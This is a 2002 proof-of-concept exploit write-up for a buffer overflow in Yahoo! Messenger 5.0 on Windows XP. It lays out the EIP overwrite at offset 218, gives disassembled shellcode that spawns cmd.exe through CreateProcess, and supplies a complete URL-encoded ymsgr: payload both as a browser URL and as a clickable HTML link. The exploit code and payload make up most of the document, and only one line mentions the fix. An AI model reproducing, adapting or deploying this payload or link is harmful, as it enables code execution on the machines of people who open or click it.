Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro





Intro:
Proof of concept code for YM Buffer Overflow as discovered in:
http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt





Code flow:
Overwrite EIP at 218
Point EIP to a "RET" in the memory
"RET" jumps to beginning of shellcode
Shellcode spawns cmd.exe
Terminate YM gracefully :)





'shellcode':

55     push   ebp
54     push   esp
5D     pop   ebp
33 FF     xor   edi,edi
57     push   edi
C6 45  FC 63   mov   byte ptr [ebp-04h],'c'
C6 45  FD 6D   mov   byte ptr [ebp-03h],'m'
C6 45  FE 64   mov   byte ptr [ebp-02h],'d'
57     push   edi
C6 45  F8 03   mov   byte ptr[ebp-08h],3   ;Max window
8D 45  FC   lea   eax,[ebp-4h]
50     push   eax
B8 7E684C67   mov   eax,7E684C67h     ;CreateProcess@77E684C6h
C1 C8  04   ror   eax, 4
FF D0     call   eax
B8 7EB854B7   mov   eax,7EB854B7h     ;FatalExit@77EB854Bh
C1 C8  04   ror   eax, 4
FF D0     call   eax





Test:
Parse this to your IE browser
ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77

Or put this into an HTML file
<a href="ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77">Click here</a>





Fix:
Update YM at http://messenger.yahoo.com/




Credit:
sk@scan-associates.net
31 May 2002